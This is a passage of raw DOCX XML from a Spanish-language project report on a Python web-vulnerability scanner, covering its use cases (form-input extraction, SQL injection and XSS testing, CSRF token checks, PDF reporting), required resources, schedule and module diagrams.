        <w:t xml:space="preserve"> para realizar el análisis, la interacción web automatizada y la generación de reportes. Además, el proyecto está estructurado de manera modular, permitiendo su fácil mantenimiento, escalabilidad y posible extensión a futuras pruebas de seguridad adicionales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40937E40" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5222">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.4. Alcance (Casos de Uso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755F3A75" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Caso de Uso 1: Análisis de Entradas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61529935" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El sistema extrae los campos input de los formularios web de una URL especificada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CC6617" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Caso de Uso 2: Prueba de Inyección SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1475400C" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El sistema envía cargas maliciosas en campos para detectar SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7126CEF8" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Caso de Uso 3: Prueba de XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DEEC49" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El sistema inyecta scripts maliciosos en campos input y detecta ejecuciones indebidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1BB7D0" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Caso de Uso 4: Análisis de Protección CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116773D1" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El sistema verifica la existencia de tokens CSRF en formularios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D2D6D1" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Caso de Uso 5: Generación de Reporte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B87EB1D" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El sistema genera un reporte en PDF con los resultados del análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0853938D" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09503DCD" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5222">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.5. Recursos Necesari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7"/>
        <w:gridCol w:w="5918"/>
      </w:tblGrid>
      <w:tr w:rsidR="00254721" w:rsidRPr="00DE5222" w14:paraId="284403C7" w14:textId="77777777" w:rsidTr="00915A16">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="665F9013" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00915A16">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5222">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Recurso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B27285A" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00915A16">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5222">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Detalles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254721" w:rsidRPr="001D1995" w14:paraId="636E510D" w14:textId="77777777" w:rsidTr="00915A16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54519F2A" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00915A16">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5222">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Hardware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A53FF19" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00915A16">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00254721">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>PC con navegador web y conexión a Internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254721" w:rsidRPr="00DE5222" w14:paraId="7BB92063" w14:textId="77777777" w:rsidTr="00915A16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A2839F0" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00915A16">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5222">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14437A57" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00915A16">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Python 3.6</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE5222">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>+, ChromeDriver, navegador Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254721" w:rsidRPr="00DE5222" w14:paraId="38C12DB9" w14:textId="77777777" w:rsidTr="00915A16">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="081C6C6E" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00915A16">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5222">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Librerías de Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4578722E" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00915A16">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE5222">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>requests, beautifulsoup4, selenium, reportlab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6603D1F8" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9B070A" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4569CC58" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00DE5222" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DAF269" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C052A9" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8C143D" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15719E27" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C61CCF9" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CA0E12" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA65C56" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3654B605" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C74408" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3501A222" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49BAF8BE" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1038D259" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3067094F" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664046C0" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22596DF8" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417B58AC" w14:textId="38A89811" w:rsidR="00254721" w:rsidRPr="00B52F07" w:rsidRDefault="00254721" w:rsidP="00B52F07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE5222">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.6. Cronograma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7673BDBD" wp14:editId="017CC617">
            <wp:extent cx="5608320" cy="7871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320" cy="7871460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34059FAB" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Análisis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CB2D26" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.1. Identificación de Paquetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8FF654" w14:textId="77777777" w:rsidR="00254721" w:rsidRPr="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254721">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Modulo Operaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE9C117" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="643DD1F4" wp14:editId="32AC6BB6">
            <wp:extent cx="5149215" cy="1941195"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="5" name="Imagen 5" descr="C:\Users\David Soliz\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Modulo 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 Soliz\AppData\Local\Microsoft\Windows\INetCache\Content.Word\Modulo Operacion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9215" cy="1941195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA1819F" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Modulo Reportes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F68ABF" w14:textId="77777777" w:rsidR="00254721" w:rsidRDefault="00254721" w:rsidP="00254721">
